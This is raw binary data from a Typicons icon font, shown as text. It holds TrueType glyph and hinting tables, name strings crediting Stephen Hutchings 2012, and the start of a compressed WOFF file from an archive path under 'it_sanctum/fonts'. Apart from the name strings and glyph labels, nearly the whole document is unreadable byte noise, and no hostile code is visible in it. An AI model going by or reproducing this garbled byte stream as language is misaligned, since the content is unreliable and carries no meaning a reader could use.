+"264&2"&4"27.'2#"&546.hIIhIӬzz�z�;T<�;S:m��kp��&IhIIh�z�zz��]$%SeB!22!Be���y!@[OSG$%+2"&44632#"&��zz�z*�pm��kp�yz�zz��	BeeB!22����'2<HTn�@+#BAK�
PX@Cj^^k\	\
	
	
[
		S	G@Bjj^k\	\
	
	
[
		S	GY@)mkhgdc`_\ZWVPOJIDC>=9743/-)(''"!+&/&343632?6#!"56767"32654&"326542"&=4$2"&=4!+"&=#"&=#"&�&-5/%	%;�g(#�
��  a  �6�* S )i"26	5	%.8(!"

�������M��}}}}����4�K�
PX@2	B@K�PX@2	B@@2	B@YYK�
PX@ h_OSGK�PX@hOSG@ h_OSGYY@0.-+)(+&?'.'&"&#&'&'&'&7>7676332632C*t*l>3'
.B=G7!
 %;Tc13&&.
C:CC:��8XB)
>&(,-<0:L$I$#%%P����+9�K�
PX@'[	[[SGK�PX@&	O[[SG@'[	[[SGYY@,,,9,952('# 6
+#'&=46;272#%&=46+"=463767%6#!"=46$	�	�	>w		��5�	�	>w	���
�		��
)�	0��	&	���	��AP'0@E�@CB	A
.BK�PX@<

h`		[
[
YOSG@=

hh		[
[
YOSGY@"21)(	ED:71@2?-,(0)0!'	&"!+432#"276/+"&'5#"&=46326=#726=4&#!"3%52�)**)�0GG#"GF0SJfE}3JJ3�T��6qSV))*$@-�-@+2JE3/J3�3J��TT���d�TkP%@@=
B[O[SG#"
+2#"/#!"&5463!276264&"A
kI4�64II4�4Ik�4%%4$���54II4N4II45��$4$$4���-'0C^@[*)-.0(BO[[	[SG;932" ''
+2#"/.#"&=46326?62#"'62#"'&4764'&�//oO4II4No��%_##_%57O~#//

-/+�_+0JI4S4IJ��S}�	%	��4:/BA/

"@��qO&-;?Ea@^-'$B6,*C?5+DA@><
BjhfO[SG:831&&$*&'+#"/&'#"&4?.=46326?63276753275#"57Yq/o2i@"*I4No/A�7T��v#_%�(|TOO"q��+0Ji#@?&S4IJ*@w	%	XT6�Sve�f�0S�4��-$6P^gt@qa`dU	eTgB_AO	
	[[


[[[SGRQ87YWQ^R^LJEC?=7P8P&%+#"'&4764'&4627#"&4764'&4627"&47654'.62%2#"/.#"&=46326?62#"'e//

#_QQ88#_tt"[[#��//oO4II4No��%_##_%57Os/BA/

"@#GQrtQ#8�8"Hr��t#[��[#/+�_+0JI4S4IJ��S}�	%	��4���-'0M@J*)-.0(BO[[SG&$+2#"/.#"&=46326?6#"32'�//oO4II4Nof#_%%_�7O-/+�_+0JI4S4IJ�RSa�	%	��4��!�#/K@H'Bh[\OSG
.-#!
	+"3!26'&'2#!"'&76432#"&'&5462�'�#4�4"�&U2�2))d�c+*3�27667u9#%4$:,�f,@@,�,TU�eTKJJJU�U��7760�V9%%��!�%1@.B[[OSG%3+%#!"'&7632264&"654&"2763*)d�e)*3�2VU2�6%%6&�*<+:;�UJJJJU�UU�%6&&6++
����G�(4@H�@-*
 
	96	BK�PX@8
`[

[	\		[OSG@9

h[

[	\		[OSGY@FEBA?<8730,+&#
+"&=46232#7+"&=&47546;2!6254&+"5"';26&264&"$"*}SSI4�4ISSI4�4I��<�<��<�<�Ӭzz�{S)"�U�UX4II4XU�UX4II4L""L��L""Lez�zz����d(>Vl�@�	Bhhh

h[
[[

[[[	[

[O		\SGlkihfea`^][ZVUSRPOJIGFDC>=;:87"+2"'&"#"&547&547&547622764&""'&"2762227622764'&""'&"64&""'&"27622>fJ    %X�X,$43J    %Y�Y,u"'r'@�@"(p(@��
 
'r'@�@
 
'r'@��"(p(@�@"'r'@�0J30##10##04%XX$J30##01##03%YY�=#''@@#((@�"

''@@"

''@��#((@@#''@G-D�@�

h		hh

hhh

[[	
	[

[[OSG/.@?=<:95421.D/D)(&%#"--+%"'&""&47622762'"'&""&47622762'"'&""&47622762�[@(o(#@�@(o(#@Z[@(o(#@�@(o(#@Z[@(o(#@�@(o(#@@((#@@((#@�@((#@@((#@�@(("@@(("@AP,M@J"Bhf[OSG'% ,,
+%!"&5467546326%"3!264&#"'.#"q�6EbF7�gP�\�z�� 01#�4II4-\=Eb
bE:Yh�]K{[V{�2D1IhI
.<OaE2�8Ay#[\@Y1	F*
B	
	
h
	
f		[[[SG%$XVRPKIDB/-$[%[
+"&=462"&=462"&=462%"&5467546326&'&67>54&#"'.#"#"32/""��""e""��EbF7�gQ�[�UC)3I4-\=Eb
; 01#u����l���bE:Yg�\K|[FoC*4I
.<ObE21"#1"���P9@6B[OSG
+"/76/7632'3264&#"�637%QQ%763����^��^?!-cc.����T���j�����<Gb�@~	?A0 -B3Ajh

f

f[	[OTHIH>=^\WVUTQPNLHbIa=G>G9754(%
+'&6767>'76'.76#!"&5467547&663632'"67654&264&#""'.'"'"32)*)�v;#-}}!$��;v
6�<JzV�6EbF7"$Ln7UMn�, X#
==4II4!Z;Eb
; 01#�}}!$�;v
5��*)*<v;"��iBV{bE:Y2,>T?nM�"Z+=�!IhI&:LaE22D1��Ay5=EMX@U0)
7G?Bhf[OSG.,$"	55	+%"&463264&#"'.#"#"32#"&5467546326!7&7&'7&q4II4-\=Eb
; 01#EbF7�gQ�[�z��***�*)*�*)*2"IhI
.<ObE21"#1"bE:Yg�\K|[Vz}}!$7}}!$}}!$�������@�um
��~|fd\T
�K
�H�A7.,B



h

ffhf	
OY	SG��������xwkjNM*+%/"&/#"/#&?#"&4?&'#'.?'.76?'.>&47"&'&6?'.7>'&67667'&462'&6767627>7>#/76&264&"�6E.


)	#.E%

f=??=f6E.#-!)	!-#."E%

f>??>�V==V>�N=?	."

S!$S".	?>O
$
 O>?	."-c!$c-".	?
=N
$
=V==V�bAy5;^@[0)
67B;:98?hf[OSG.,$"	55	+%"&463264&#"'.#"'"32#"&5467546326%7'q4II4-\=Eb< 01#EbF7�gQ�[�z��>}�?}2"IhI
.<ObE41"#1"bE:Yg�\K|[Vz��=��<
��
�'/7?GOL@I9!	1)Bjk[OSGMLIHEDA@76'&+'&676&'&67&'76'.767'&6'&7>"&462&"264�)**�zz!#A*)*�zz!#��9t
6/t9"�9t
6/t9"Ӛoo�n�V>>V=yzz!#��***�zz!#@***=t9"�9t
6/t9"�9t
6�jo�oo��=V==V��A�(Xp@mBh
		h[[
	[		[OSG*)UTQNKHEB?=:963/-)X*X 
((+7"'.546754632&'.#"'"2++"2#"&46;264&+"&463!264&"&46u	.6F7�g\�\=Eb
; 0:4II4[I4�"4II4���"�S2:Yg�v[<OaE52")
	' lIhI4I""IhI""""�P/E@B	[[[OSG,+(%"
//
+2+#!"2#"&463!264&+"&463!264&"&46X4II4[I4��"4II4��"PIhI4I""IhI""""���G/?Z@W
		hh
[
	
[[OSG000?0?=<:954/.%+#"/.547676 264&">4'&"27623>4'& 2762�,�/"A-�
�m�
	&�i4$$4%�$C�C$5U�$s��t$4P�O`@,�2�
40'uu

$��$4%%4R$5CC5$v$5ss5$PP����jf
.>@;jjjjOSG-,*)	+.4762"'& &'&476$"&47>"'&"�E2E
!z��zDp,-p2��D2@��@2D1�1	0EF1yyCpOOpC2�2D@--@D211����%+1>@;BhYYOTH;#3%+32+"&46;57.54>7>3!2267!'!&'#�mR)�)Rm2��nS��
(��U��""��U/wA

Aw�G66`OXX����@h�@�df	Z	2
KYB1"0#)A

h[		[
Y[[

O

T
H_^VTQOEC?>##,+  &5463267&#"4>32>457'#"&46354&"4632#"&'&#"&='2654&'�6����w	! ',T�%=S'"'
))*""}*!H
I���]L%�����6#3
}"1)UH>STS
( %*)S"}e*#Z=$B�..y��yW�#,,����@i@f		:&B;%$Ahh	[		[[OTH?>#%
+  &%5&#"4>32>457'#"&46354&"54626�6�����*)K�/{S'"'
))*""	!< �����6�>7{STS
( %*)S"}#3
}"11���d.9Ac@`.1/
#
B[[
[
	
[		O		S	GA@=<53*)&$!
	
+2+"&=#"&46;5462#"/#"&46232654'264&"�

T
S

S
^&L61'd0*y���E)i��{�zz�V

S

S

S

S�&lM!c��y+01)h
K�{{�z���d/7Y@V/$	Bk

[[	[		O		S	G7632+*'%" 
+2+#"&=#"4;54632#"/#"&462$264&"�		T	TT	 
)&L67&^0+y����{�zz�VS	S*S	S�
+&lM&^��y.-��{{�z���d)1N@K!B[[[OSG10-,%#	+#"&46;2#"/#"&46232654'264&"��

�

&L61'd0*y���E)i��{�zz�,



�&lM!c��y/,1)h
K�{{�z���d!)G@DBk[[OSG)(%$
+2+"&463#"/#"&462$264&"�		�		�&L69$^0+y���	#	��{�zz�V�&lM&^��y.-	$	�{{�z���y"-5R@O%#B		[[[[OSG32(##
+"264&2"&44?&5462#"'#"7&'3276264&"�hIIhIŠaa�b�&^��y+0d'16�)h��zz�{�IhIIhra�bb��ol&_+0y���c!�)ig{�zz����y$,E@BBk[[[OSG##	+2#"'#"&476?&54264&"62"&4264&" �y+0a(36L%* άzz�{��aa�bshIIhIy��a#Ml%+ 0+y��{�zz��a�bb��IhIIh����_<����������  �Z����Ll!��G���G�����%����������%��q�G����tj@u���G���G��AA�����������������AL�%�?���G���������������������A���GGG�������l�������((,��AGAA���M33qG�2A�q�P|(��GG����GG���������������GG��A��qD��G���A�G��A�����G����e��"����w���G�i���q�I�����J���G�����k��\�A���kAA�AA�A����q��W�G�q��������Ak�q�33G�GAA��A�AA��j������(fdx�P��*^��`���6D�

��\
h�����
,�r��N�H�B�<����:�,���:�z�\�  T �!8!�""�"�#
#8#�#�$j$�%V%�&&&�'V'�(@))j)�**l*�+b+�,�-4-�.V.�/./�0P0�1X1�22|3 3�3�4>4�565�6(6�7�7�8B8�8�99�:T:�;�<X<�=v=�>�?F?�@�A:A�B0B�B�CC�C�DhEE�F|F�GlG�H\H�IvI�J�J�K�L(MN2N�O$OFO�O�P|P�QpQ�R8R�R�S:S�S�T0TfT�T�T�U(UVUtU�U�V6VbWWpXX�Y>Y~Y�Z6[�[�\<\�]@]�^6^�_"_�_�`:`�aNa�b^b�c�d:d�e4fg0g�hlh�iri�jRj�lFl�mtn$n�obo�pHp�p�q.q�r|s�t|t�u�v.v�wwfw�xfyTzz�z�{�|J}}`d��������Z���D����B����ЇN�"�ЉV�ƊX��t�������z���b������B�Ɣj��4��Z��Z��r��:���̚Л��&��B�؞r�D���*���>�2��R���H�"������:��R��N����� ���,����~��Q�lyn
	��"$&JHR�	4�	�	�	H�	6	�F	�(c) Stephen Hutchings 2012TypiconsBookFontForge 2.0 : Typicons : 27-7-2014TypiconsVersion 2.0.3 ; ttfautohint (v0.95) -l 8 -r 50 -G 200 -x 14 -w "G" -f -stypicons(c) Stephen Hutchings 2012TypiconsBookFontForge 2.0 : Typicons : 27-7-2014TypiconsVersion 2.0.3 ; ttfautohint (v0.95) -l 8 -r 50 -G 200 -x 14 -w "G" -f -stypicons��2Q	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQglyph1glyph2glyph0glyph3glyph4glyph5glyph6glyph7glyph8glyph9glyph10glyph11glyph12glyph13glyph14glyph15glyph16glyph17glyph18glyph19glyph20glyph21glyph22glyph23glyph24glyph25glyph26glyph27glyph28glyph29glyph30glyph31glyph32glyph33glyph34glyph35glyph36glyph37glyph38glyph39glyph40glyph41glyph42glyph43glyph44glyph45glyph46glyph47glyph48glyph49glyph50glyph51glyph52glyph53glyph54glyph55glyph56glyph57glyph58glyph59glyph60glyph61glyph62glyph63glyph64glyph65glyph66glyph67glyph68glyph69glyph70glyph71glyph72glyph73glyph74glyph75glyph76glyph77glyph78glyph79glyph80glyph81glyph82glyph83glyph84glyph85glyph86glyph87glyph88glyph89glyph90glyph91glyph92glyph93glyph94glyph95glyph96glyph97glyph98glyph99glyph100glyph101glyph102glyph103glyph104glyph105glyph106glyph107glyph108glyph109glyph110glyph111glyph112glyph113glyph114glyph115glyph116glyph117glyph118glyph119glyph120glyph121glyph122glyph123glyph124glyph125glyph126glyph127glyph128glyph129glyph130glyph131glyph132glyph133glyph134glyph135glyph136glyph137glyph138glyph139glyph140glyph141glyph142glyph143glyph144glyph145glyph146glyph147glyph148glyph149glyph150glyph151glyph152glyph153glyph154glyph155glyph156glyph157glyph158glyph159glyph160glyph161glyph162glyph163glyph164glyph165glyph166glyph167glyph168glyph169glyph170glyph171glyph172glyph173glyph174glyph175glyph176glyph177glyph178glyph179glyph180glyph181glyph182glyph183glyph184glyph185glyph186glyph187glyph188glyph189glyph190glyph191glyph192glyph193glyph194glyph195glyph196glyph197glyph198glyph199glyph200glyph201glyph202glyph203glyph204glyph205glyph206glyph207glyph208glyph209glyph210glyph211glyph212glyph213glyph214glyph215glyph216glyph217glyph218glyph219glyph220glyph221glyph222glyph223glyph224glyph225glyph226glyph227glyph228glyph229glyph230glyph231glyph232glyph233glyph234glyph235glyph236glyph237glyph238glyph239glyph240glyph241glyph242glyph243glyph244glyph245glyph246glyph247glyph248glyph249glyph250glyph251glyph252glyph253glyph254glyph255glyph256glyph257glyph258glyph259glyph260glyph261glyph262glyph263glyph264glyph265glyph266glyph267glyph268glyph269glyph270glyph271glyph272glyph273glyph274glyph275glyph276glyph277glyph278glyph279glyph280glyph281glyph282glyph283glyph284glyph285glyph286glyph287glyph288glyph289glyph290glyph291glyph292glyph293glyph294glyph295glyph296glyph297glyph298glyph299glyph300glyph301glyph302glyph303glyph304glyph305glyph306glyph307glyph308glyph309glyph310glyph311glyph312glyph313glyph314glyph315glyph316glyph317glyph318glyph319glyph320glyph321glyph322glyph323glyph324glyph325glyph326glyph327glyph328glyph329glyph330glyph331glyph332glyph333glyph334glyph335��22 � ��,� `f-�, d ��P�&Z�E[X!#!�X �PPX!�@Y �8PX!�8YY �
Ead�(PX!�
E �0PX!�0Y ��PX f ��a �
PX` � PX!�
` �6PX!�6``YYY�+YY#�PXeYY-�, E �%ad �CPX�#B�#B!!Y�`-�,#!#! d�bB �#B�
*! �C � ��+�0%�QX`PaRYX#Y! �@SX�+!�@Y#�PXeY-�,�C+�C`B-�,�#B# �#Ba��b�`�*-�,  E �Ec�Eb`D�`-�,  E �+#�%` E�#a d � PX!��0PX� �@YY#�PXeY�%#aDD�`-�,�E�aD-�	,�`  �	CJ�PX �	#BY�
CJ�RX �
#BY-�
, �b �c�#a�C` �` �#B#-�,KTX�DY$�
e#x-�,KQXKSX�DY!Y$�e#x-�
,�CUX�C�aB�
+Y�C�%B�	%B�
%B�# �%PX�C`�%B�� �#a�	*!#�a �#a�	*!�C`�%B�%a�	*!Y�	CG�
CG`��b �Ec�Eb`�#D�C�>�C`B-�,�ETX�#B `�a�

BB�`�
+�m+"Y-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-�,�	+-�,�+�ETX�#B `�a�

BB�`�
+�m+"Y-�,�+-�,�+-�,�+-�,�+-�,�+-�,�+-� ,�+-�!,�+-�",�+-�#,�	+-�$, <�`-�%, `�
` C#�`C�%a�`�$*!-�&,�%+�%*-�',  G  �Ec�Eb`#a8# �UX G  �Ec�Eb`#a8!Y-�(,�ETX��'*�0"Y-�),�+�ETX��'*�0"Y-�*, 5�`-�+,�Ec�Eb�+�Ec�Eb�+��D>#8�**-�,, < G �Ec�Eb`�Ca8-�-,.<-�., < G �Ec�Eb`�Ca�Cc8-�/,�% . G�#B�%I��G#G#a Xb!Y�#B�.*-�0,��%�%G#G#a�E+e�.#  <�8-�1,��%�% .G#G#a �#B�E+ �`PX �@QX�  �&YBB# �C �#G#G#a#F`�C��b` �+ ��a �C`d#�CadPX�Ca�C`Y�%��ba#  �&#Fa8#�CF�%�CG#G#a` �C��b`# �+#�C`�+�%a�%��b�&a �%`d#�%`dPX!#!Y#  �&#Fa8Y-�2,�   �& .G#G#a#<8-�3,� �#B   F#G�+#a8-�4,��%�%G#G#a�TX. <#!�%�%G#G#a �%�%G#G#a�%�%I�%a�Ec# Xb!Yc�Eb`#.#  <�8#!Y-�5,� �C .G#G#a `� `f��b#  <�8-�6,# .F�%FRX <Y.�&+-�7,# .F�%FPX <Y.�&+-�8,# .F�%FRX <Y# .F�%FPX <Y.�&+-�9,�0+# .F�%FRX <Y.�&+-�:,�1+�  <�#B�8# .F�%FRX <Y.�&+�C.�&+-�;,��%�& .G#G#a�E+# < .#8�&+-�<,�%B��%�% .G#G#a �#B�E+ �`PX �@QX�  �&YBB# G�C��b` �+ ��a �C`d#�CadPX�Ca�C`Y�%��ba�%Fa8# <#8!  F#G�+#a8!Y�&+-�=,�0+.�&+-�>,�1+!#  <�#B#8�&+�C.�&+-�?,� G�#B�.�,*-�@,� G�#B�.�,*-�A,��-*-�B,�/*-�C,�E# . F�#a8�&+-�D,�#B�C+-�E,�<+-�F,�<+-�G,�<+-�H,�<+-�I,�=+-�J,�=+-�K,�=+-�L,�=+-�M,�9+-�N,�9+-�O,�9+-�P,�9+-�Q,�;+-�R,�;+-�S,�;+-�T,�;+-�U,�>+-�V,�>+-�W,�>+-�X,�>+-�Y,�:+-�Z,�:+-�[,�:+-�\,�:+-�],�2+.�&+-�^,�2+�6+-�_,�2+�7+-�`,��2+�8+-�a,�3+.�&+-�b,�3+�6+-�c,�3+�7+-�d,�3+�8+-�e,�4+.�&+-�f,�4+�6+-�g,�4+�7+-�h,�4+�8+-�i,�5+.�&+-�j,�5+�6+-�k,�5+�7+-�l,�5+�8+-�m,+�e�$Px�0-K��RX��Y�c �#D�#p�(	ERD�
*�D�$�QX�@�X�D�&�QX��X�DYYYY������DPK!�������'it_sanctum/fonts/typicons/typicons.woffnu&1i�wOFF����FFTMll3�GDEF� ~OS/2�J`6mQ�cmap�4�NRY!cvt (s�Nfpgm<�	��
x;gasp	8glyf	@Թ]̺0head�469Ohhea�0$dBhmtx�P�:��loca�P��;\maxp��  K�name���"v�wpost��&-�Aprep�VV����x�c```d�3��΃��~�hU[@x�c`d``�b	`b`d`d�,`��x�c`a:�8�������iC�f|�`��e`ef��! �5������
�-��>���(00��x���S�����g��m۶�Mm�L��Im۶�Զ����H��M��:�̙937�E5������pY��JK�^Vd�WTV�*-|٪�(Su�j����ꨫ��h��ƚh���Zh����w�i���:鬋��鮇�z魏���o��l���n��Fm���o��&�l����n��f�m��景�kX�Zֶ�u�g}��F6��Mmfs[��V���mmg{;��Nv��]�fw{��^���>�����@Y�`�8�aw�#�h�8�q���'8�INv�S��tg8�Y�v�s��|��E.v�K]�rW��U�v�k]�z7��Mnv�[��vw��]�v�{��~x�C�z�#���=�IOy�3�����E/y�+^��׽�Moy�;޵�{�A���>�O|�3��—�����|�?���~������V�Ge$)�Z�R=婑���ک�����i��i��i��i��i��i��i��i��鐎��钮��鑞��链����������������񙐉��ə����陑���ٙ������Ȃ�r���B�T��F���_�&��x�c`@FF�
��@
��x��U�v�V�<dp:d����8P�ʄ)0i*�v!��t��>�k�B�V���}=$�t��,�ϾG[g�:�F#*}�kԡ����=�J�I\�u/��q]�OI���$Jj��P.�X�*Y'X'�� VOU�g��eIDD��&I��'�g%I %����PB5�RաL�Ы�q�@�F�uXT�C�'�5�ԬF*W9���F��/{��:����1x�~�*�����?vJN���TqԡV��0�_��L*�@��bE��t�1=t:�.J�F����(����(��������ST�]q��@f
\J�lt�D&R��N5���G�����\��<U2�z�3;{q1�n'��p��2ovv㝇C�W��L��G��b~>B�Pj~"N$�FX��qW B�1���S�9tE��f]�1���J�a=	��~
�N$+gQ��H��c�u��gPK��;2�C�"���3�a�U_���4��g�@�4�K��)J�o��L�h�
�T�]6��)�iϚb��S�Ҟ32������]�}�i�Gn���V!7m�i/ 7�Fn�U�:viRA�4��a�V��@֌4|i`�.b��DG�����u�ri���"��.��><��Fݰ�Ƒ�0Fz��Y����M�.��2�2�L
�e�@�:�	������`\�x�JC�T�;����y_��9����.�\wy	Y�
rc���Rd���-�T'G�+'�UkC*�(����{���(���^���瓐�=�B[��a�#Li�%^S�(=�R��C,o)�<�Z�ĸujk��z!����pH)]ߴ�w��k�����zr��*�Q�T�F��ڼf�2�)U����O���QYi����T�4�9�O�k�to8h�=T|4A#U5���(c4�5��t1V~�h�b�=�O��U��K���഻�*���[F���m䊟#1�-
�;b�d
�;���Y��&w��m�m�?&��߆�ErW;�y��ՓQ%w���MvYף6G�N��-7���r,��`A����1�wiQ���e���t�������m8Wvͱ�tz.A����	���#�.�}rv�!����ȹ�99_�C0 �`��;�!xH�9��������!��!Hȹ
��'�|M�7F�Nd����΢�@���8dF�M�<X��EdZDꑑ��S,�{�H��"R4rcB��K��"R���gƗ�#)������^��x���|\�y/���ϙ�����#i�y�iF�y[�k,[�d[F�@��lcdalS�!@�H�HR�mRܴ�״iOh�r���4i/iz����-��KsN|�p�o�id��`�޳׷��{��	#1Bh�=L���j�"0",F)�&��}"l�qBY�2A�<ق��=�����M���r�]���Ə�#�<�M$[�ģp�"��Di�?y�<K�>��#�ގ�G�Hy��r1���|�/'�N��?_��÷z��]����yv��pN�~��>x�n9��yBd��i�
��E'9@���$�~�7=��,m0����������/ٮ���M��K�ˇ��J��W���E�2��m̾�6���d�k�(���E�f��H-�1�����?d��[YY\$d����7_^<�xx��5{''��m-�z3]�v���T��@��%ż_*�i�T,��R�C��?Y��^V*VR���������o��Fh�X0H���T�cx@��ӕD
~�N��.�*�:�Yד��?��c3�ɫ���3���7��?���d�oje�?a�q��=��o�uu��>7�daW�g�����T��5�'��Ϗ�of���5��<s���-�p�9�)NM�F��pܨ���={��\�}�ہ��qen�ao\��w8߅H;I�>R!�d�l�V���P�;�j��T�a��=I� p�f�����۪����Y�N�+�BC���m
iS��(�0{q�N�Ty�*.jF)��즕*"�SE�����{�w�1YMГ]��E5�v��[�Cw�β6p��B��qƮ:P���O�~�}�<D[퇙���Cj?����D<�E5��]������l���g>s�aN�y�16�� 92@�T��m=F	#6UTm�
�T t�Pz3��j��E��� �Jf*���#��~���&�1�u
��P����Ə�J��T�R9�!#�2g<�ԫO,M^��a���l�g^D�8��'_1�sO?}��~o�a���0��üw�N�4�z�A���0�D5<�#�Vgl��ȄE;�DeA��e�_�%I�����*K]�FةQ��ݙ��E�i#��h!gP���5��=���N���խ���ϕK�G��}��i�U\�DZ1kC�d���b�Bq����Q+�uڭy5�G��Eƪ��.a{�4\�&j?ԍz����1�
-�V��_�	ݔjWK(hHFD���f`%�f�D�-oKGӡp\�fMx�x���Aŀ0�T�BG@ �h��`���ђ*�W�ހ�u���~�iTM����vߥ��ϝ0_~Y�þ]�䡸�!АI��
�����M�؃�����=$~R��"�!��F�(X�"P�X6��%��N��/�l��ű6Z�I�q�W?��x��*kl��Ox���̑�Šnh�|A���7�~?C��.���u�"@5|	�Pi�C 3�"¬(�%�D0`&ۣ�L0�oVB��8߷�2(k�b���E�:W�z:E�k?0�MI��r�4k�7���Nh���Ӯ�]�:^���C����4\�k�чPfj����o���O�$�w�D�->�(|szB`о#��	�aQ�x%�g9�N�C�a+e����f�wc�D<7f�Uخ�;u;����r��wƐ�����1�:�~���'�@��ܠc�g��pX{�yl�a����	�]Kt���%m3w���xLa"��N��A�c��I�iQ�"h+�}��{���S,���4i���;���i�\�}D�"��8KE6+�J:U��3��W?n�'B�?Z�硝acn��I�d^~�8�����|��&8��j����!y�.��)�8�>z�\�{3y%�sQ:�\�i�K��wi9��{o^4�Q9n��V�Nq�* yq��կ��t`��ZmM3�a���Ǿ�i�/&ۋ8
y;(1I�c�x�Q��%&/���g�(�Y� �Dҟ0�^5���V>T"���f5y�!�H�*�(��k٬}�v%N$����^ͷ���.�v…	��K�,$�-�����y���y�G�Y�y��令"�r��"��DT�Hd:I�`�"�
I\=�V��,�7x���'��A��-F7��y��q#����qc��S�<��p����=�]I�����*
�E߂����]�y�K�i	����/�;@��"y��>��T�)�`P��'��΁�,ڨB4Y�:;��� qUp��n��7LA(H�k���R�ugRf��5m�56ó�m
�7H�J�gκ��3Ea�0�U�4�Ӣ���>@�B�c�t��V�u�O��]@�ߕ��K�?z����#�h�V�.;lL�hA��_�����#�LKW"���;�h����*(������T����w>s��t}�a�k�����+�\��p���%�}�n�9��3��[_N":��~E'��"2 "�0S��T�~��/�E�*҉��_r��]���z������҅�*tZ:��FB~ݭ��diֶ�m��MN����(�� �O�9?_{1;R�C��ũ��|IӜ�:��w�|@)`N�pe-�9�?��SFE��#���%yM����/�����
��}��q]�=ڍT��S�$��M�9�����BD- j�D��E_!�ϣ�����[^���@�DS�C�-��j`!�e��zͳH|Dr���!x.�0��1��\l�0�\:45�L�q��z���c�n_����ܵ{�L�0u������-�B2����v���`��-b���]UPZ�Ā���1M��U�zl�����F-��1��!KH����(�g��$@x��Ç8���$J�������:'�j/���Ɲ�/^XŎ����'t�e����
��a<��:0���Nɾ����f��>�D�%�R��>��-�6{��.>��d��w��_{�@��ta��no��՗�t.�y�����&.�q�E�wW?��眥��j��VS�L]&�î:��C�;�e�vQ�p��2�9����S�h�S;�]�f��9�k2h���Ց���R��|:���C^����n���^�)�ө�(�ދ`	�e�X��eu��x����Eto�$/��X�x2�/"�V�r<�;g��[�$��V[։�%]km��)�2�M��}�89C� ���^���I)j�SE��jJXu9oke!�Q���(s�7)t[i�
�]����AUET��Sn7"^� [���%;}�EBWh���t����!�Z{na�na��[WVzz(�����/����[�=+gVΜ:�|��C��?�ofϮ���F{�����������F�iw���ܔG;��i��%
�����z�#m�3�\L7�R="����%ޟJ(�{�¯Xb� ��G��^gj0�0�H�uIk6oj O��*p�,v=	�ң;7���a�C��Q�.�wk�t�.ۧ�',��������K��
E3��-�yM�iO�y�e.wr�[�2d�K��w���C��@ s��ݡ|2np�z�.{s�C����Z�e'8�*Um {v��qJ���L�R�0 ;$�
�f�xPq�u�SU����9��T��c��[�}=�N3k��$h����2�kBZ���7��l7�mD�\Yd:�!zH"�.{Æ>qC���E\���͂Gd��T�����2�>�������S�'
�]\9��;�$�Y
�ZZ�s#+!�#�����o1`^��v�x�I�!���vׂ��5�`n�"b�Y���z��{�n}�{�s���'��|����G�,����kwM����s���x{�yo�ݐ6
=��x���QtD�P���ٺ$*
y�S�x��rQ*���`:({�P)](�	��*���Qè�a��4(�2f|���A��_+s4��#����7��>E\�:_)���+Z�_*�Tr�%9X�v~���x�ڧ8Q,��E@# �ca��=7W���ғ%������~4���O�>���DdžK��Z��4��Z��FUY=ᠲ�ȇ$�OPrX� 5v��*ӰR赀���{��&�n��]Ϳ"�����wl�/�$�pÚ�\�u�W��K	����BI��l6��@�_��t\�
������,���sM]N�o�s�p�Sa�s���p��T�1r�Md����Ti�;o���mN���R��}(Ԗ࢒*H`�T⴫�Eb'�b��͡\px�Mt��&���y�=� L��X%>t�]�t��������C����35�}lV_6�JvTc����R;m6;H���-V��B���p�����N��W9L�Ժ3ōY����=��;��O�5��]��U�'�֫ʠ��]h�R�D59V����3�ו]�b��Хo�\g����G��=�q�-]/@L�Nw��
w��;e���و	�#Q2L���C�c���U�p��I�1�AqY�i#��:(�Q���9�_�-�N�u��w
2�I���|�B5J� ˜��1~��a�?J�Ά;fyc
��Q벗��
B�Z��q�l��j���=�U��Ϝsg���/�o5�n�����e[�$�����T���`�Ő�g�,�Œ�D{����3��F��c�eEDk#B�Α�"F��!��Q�@�q���)���.&KN����3�%�,�8��]������A���ݻ
6��nؠ6î�l�d"��^�C�@�y�r�Ȧ8RW5%R&@�u'P��$<rH%_`�Iӯ��,�߸��4G!;t��hȿ3lc��$�sq�;f0���x,�Fƌ�z�t=~�.~?�L��{-ΰ �����_�¥h1מ�:�ѿ[�Q=f�eE#y��|��O�\-p�wPA����rC)ȍ�|����"6�lKh`@dJ���{:0�:��)�
r�oG^��2�j;��wr��'`p����2�Q#��("@r�k��d%�)\��I�\C�m��������J�_ǕۃS�H����[���Ȥ���ĞR�!J)��|�i���H��I��pV�5����kN��-�3'�������7����9-���(�.� U[>
@��`�1K?Xa�}M7������F:���
㍸;�"<�u��Y���8�vg+<R`��=2V��9
����Q�v��i�V�:�����A��Q*ۖ�A�}�$S�s�e�8X`�.1��#�D�	6̦�6�tEd���$�C�`��ޤ�Q�Cw���50���P�NX�V� ����I��+w�o�7��#})�7��w��>ˈZ�rYi��T�S��|e�U[ 7��.j@] ��]}�g�˕��m4�p���1?���p�ߣ�'�����8�_�p[��;�[���o�>4[���k�߱��<ߊ�l�-m��m�~�V��Q�(�~�T[��a���b���o/�����u��ʭ޵i���>�,�ֽ�}H.nX�����]��՞����&�[��ӡT�&s�Ѯ#FO�Z�N�d����8�ncN:�v�ѪV�0A򁴋
K\$�Z=DI�eNZ+��t	̈�$� �y4#�L�T��9�w��|�����?��'}j(K�7�
��Nqu
J�_<Uh�C��z��v�o�P�+Ы8;��5�t�_�1n@���G5�����v���ubeC'��K���xd�}����:�_���j�yx{#gâ�	�A���@[T=��b^�����8�Z��hiɺ���T�hR)�a+w��0挺v�=F�wa�'~҅�Ă�O��X�(��V�[*��@&Pď�=":�XDa�(�t�/�4E�]n�+��Mq��~L3��|�ưR�������q�?��B�7���۸�{�	p���Kl�}lk�p+�^U�^�Q	�~�����9+�oUh�:��'7�;��L��y�sè�y+@c�������o�B뿱���G�v��a|aV�Y�&�
mi�Z���� �hx�]���cc��҈�t�`_tؘ�� 
ST�Wa(FQ'�-�`a�@<7=�z;�%����6�c<h�K������(�x
cq�Tq$�Sڿ�/moӱ*�o?��񽣮8t���}�NGL3b�&;���ũ|~��|[���b*����ڕָ}��-3o&�I��G��
